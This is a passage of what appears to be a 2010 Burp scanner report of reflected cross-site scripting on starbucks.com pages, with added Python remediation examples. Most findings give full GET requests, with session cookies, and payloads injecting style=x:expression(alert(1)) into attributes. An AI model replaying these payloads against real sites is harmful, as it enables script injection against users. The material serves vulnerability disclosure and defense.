Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
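To make the two layers concrete, here is an added example in Python (written for this page; it is not code from the Burp report or from the scanned application). It applies allow-list validation to the three kinds of field named above, rejecting rather than cleaning anything that does not match, and then encodes a value for a double-quoted attribute before it is rendered. The input it is exercised with is the canary payload recorded in the findings below, as it looks once the server has URL-decoded it. The field names, the patterns and the `<input>` template are assumptions chosen for illustration.

```python
import html
import re

# Constructed input: the canary payload from the findings below, after the
# server has URL-decoded %3d and %3a.
CANARY = '8af12"style="x:expression(alert(1))"9f35c014f5e'

# Layer 1: allow-list validation on arrival, one pattern per kind of field.
# The field names and patterns are assumptions matching the examples in the
# remediation text; a real application derives them from its own data model.
FIELD_PATTERNS = {
    "personal_name": re.compile(r"[A-Za-z][A-Za-z '\-.]{0,63}"),
    "year_of_birth": re.compile(r"\d{4}"),
    "email": re.compile(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}"),
}


def validate(field, value):
    """Return True only if the whole value matches the allow-list pattern for field."""
    return FIELD_PATTERNS[field].fullmatch(value) is not None


def accept(field, value):
    """Reject (do not sanitise) input that fails validation."""
    if not validate(field, value):
        raise ValueError("invalid %s" % field)
    return value


# Layer 2: encode at the point of output. Inside a double-quoted attribute the
# characters that matter are & < > " and '; html.escape(quote=True) covers all five.
def attr_encode(value):
    return html.escape(value, quote=True)


TEMPLATE = '<input type="search" name="q" value="%s">'


def render_unsafe(value):
    """Vulnerable: raw input dropped into a quoted attribute, the pattern in the findings."""
    return TEMPLATE % value


def render_safe(value):
    """Hardened: the same template, value encoded for attribute context."""
    return TEMPLATE % attr_encode(value)


if __name__ == "__main__":
    # The unsafe rendering terminates the value attribute and starts a new
    # style attribute; the safe one keeps the whole payload inside the value.
    print(render_unsafe(CANARY))
    print(render_safe(CANARY))
    print(validate("personal_name", CANARY))  # False: rejected on arrival
```

Note that a name such as O'Brien passes the validator, so the apostrophe still has to be handled by the encoding layer; validation narrows the attack surface, encoding is what makes the output safe.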
The value of the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 69adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae was submitted in the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter. This input was echoed as 69adb style=x:expression(alert(1)) 21e0c039cae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
The value of the 8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8974f%20style%3dx%3aexpression(alert(1))%20727be240e75 was submitted in the 8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e parameter. This input was echoed as 8974f style=x:expression(alert(1)) 727be240e75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /?8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e=18974f%20style%3dx%3aexpression(alert(1))%20727be240e75 HTTP/1.1 Host: www.starbucks.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; _chartbeat2=qspoj3z1snwoz3gj
The value of the 8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9d18d%20style%3dx%3aexpression(alert(1))%2099773d5c1aa was submitted in the 8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e parameter. This input was echoed as 9d18d style=x:expression(alert(1)) 99773d5c1aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <param name="flashvars" value="playerType=homepage&playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=19d18d style=x:expression(alert(1)) 99773d5c1aa" /> ...[SNIP]...
3.4. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af12"style="x:expression(alert(1))"9f35c014f5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1 HTTP/1.1 Host: www.starbucks.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <param name="flashvars" value="playerType=homepage&playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" /> ...[SNIP]...
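The pattern shared by this and the following findings is visible in the response: the og:url meta tag is evidently rebuilt from the decoded raw request URI, so even the name of a parameter the page never uses reaches the attribute. The added example below (Python, written for this page; not code from the report, from Burp, or from the site) reproduces that rendering beside a version that rebuilds the canonical URL from the route and an allow-list of expected query parameters and encodes it for attribute context. It also includes a small html.parser-based check that reports whether a style attribute was injected, which is the condition the PoC depends on. The site root is taken from the findings; ALLOWED_PARAMS and the meta template are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl, unquote, urlencode, urlsplit

SITE = "http://www.starbucks.com"  # site root as it appears in the findings

# Constructed input: the request-target from the 3.4 request above, as sent.
REQUEST_34 = '/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1'

# Hypothetical allow-list of the query parameters this page actually uses.
ALLOWED_PARAMS = ("page", "lang")

META = '<meta property="og:url" content="%s"/>'


def og_url_unsafe(request_target):
    """Vulnerable pattern, reproducing the response in the findings: the decoded
    request URI (path plus the whole query string) is echoed into the attribute."""
    return META % (SITE + unquote(request_target))


def og_url_safe(request_target):
    """Hardened pattern: rebuild the canonical URL from the route and the
    allow-listed parameters only, then encode it for a double-quoted attribute.
    An unknown parameter name, such as the canary, never reaches the output."""
    parts = urlsplit(request_target)
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k in ALLOWED_PARAMS]
    canonical = SITE + parts.path
    if kept:
        canonical += "?" + urlencode(kept)
    return META % html.escape(canonical, quote=True)


class TagAttrs(HTMLParser):
    """Records the attributes of every start tag, i.e. roughly what a browser's
    tokenizer would hand to the DOM."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    handle_startendtag = handle_starttag


def injected_style(markup):
    """True if any tag carries a style attribute. META declares none, so its
    presence means the content value was terminated by the input."""
    parser = TagAttrs()
    parser.feed(markup)
    parser.close()
    return any("style" in attrs for _, attrs in parser.tags)


if __name__ == "__main__":
    for render in (og_url_unsafe, og_url_safe):
        markup = render(REQUEST_34)
        print(markup)
        print("style attribute injected:", injected_style(markup))
```

The safe variant drops the canary entirely rather than encoding it, because a canonical URL has no business carrying parameters the page does not recognise; the html.escape call remains as the second layer for whatever does get through, such as the & between two allow-listed parameters.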
3.5. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /about-us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949e3"style%3d"x%3aexpression(alert(1))"f35557201b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 949e3"style="x:expression(alert(1))"f35557201b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /about-us?949e3"style%3d"x%3aexpression(alert(1))"f35557201b0=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:20:47 GMT Connection: close Content-Length: 38360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/about-us?949e3"style="x:expression(alert(1))"f35557201b0=1"/> ...[SNIP]...
3.6. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb6ed"style="x:expression(alert(1))"7948577bab3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:25 GMT Content-Length: 56826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee?eb6ed"style="x:expression(alert(1))"7948577bab3=1"/> ...[SNIP]...
3.7. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/learn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17abe"style="x:expression(alert(1))"ea84b9a66b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /coffee/learn?17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:00:23 GMT Connection: close Content-Length: 37678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn?17abe"style="x:expression(alert(1))"ea84b9a66b2=1"/> ...[SNIP]...
3.8. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/learn/clover
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20ec4"style="x:expression(alert(1))"ceb4d722147 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /coffee/learn/clover?20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:04:15 GMT Connection: close Content-Length: 39114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?20ec4"style="x:expression(alert(1))"ceb4d722147=1"/> ...[SNIP]...
3.9. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/learn/flavors-in-your-cup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5721b"style="x:expression(alert(1))"720e97e12cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /coffee/learn/flavors-in-your-cup?5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:03:56 GMT Connection: close Content-Length: 43928
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?5721b"style="x:expression(alert(1))"720e97e12cf=1"/> ...[SNIP]...
3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/starbucks-natural-fusions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84807"style%3d"x%3aexpression(alert(1))"1a579164fdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84807"style="x:expression(alert(1))"1a579164fdd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions?84807"style%3d"x%3aexpression(alert(1))"1a579164fdd=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:54:39 GMT Connection: close Content-Length: 52482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?84807"style="x:expression(alert(1))"1a579164fdd=1"/> ...[SNIP]...
3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/starbucks-natural-fusions/caramel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72f92"style="x:expression(alert(1))"a4e88aeeae4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/caramel?72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:26 GMT Connection: close Content-Length: 42434
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?72f92"style="x:expression(alert(1))"a4e88aeeae4=1"/> ...[SNIP]...
3.12. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/starbucks-natural-fusions/cinnamon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96717"style="x:expression(alert(1))"9bd61317b0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/cinnamon?96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:59 GMT Connection: close Content-Length: 42477
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?96717"style="x:expression(alert(1))"9bd61317b0b=1"/> ...[SNIP]...
3.13. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/starbucks-natural-fusions/savoring
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da712"style%3d"x%3aexpression(alert(1))"153353c2d05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da712"style="x:expression(alert(1))"153353c2d05 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/savoring?da712"style%3d"x%3aexpression(alert(1))"153353c2d05=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:58:58 GMT Connection: close Content-Length: 41224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?da712"style="x:expression(alert(1))"153353c2d05=1"/> ...[SNIP]...
3.14. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/starbucks-natural-fusions/vanilla
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b02"style%3d"x%3aexpression(alert(1))"11530d23784 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0b02"style="x:expression(alert(1))"11530d23784 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/vanilla?e0b02"style%3d"x%3aexpression(alert(1))"11530d23784=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:43 GMT Connection: close Content-Length: 42403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?e0b02"style="x:expression(alert(1))"11530d23784=1"/> ...[SNIP]...
3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /coffee/starbucks-reserve-coffee
Issue detail
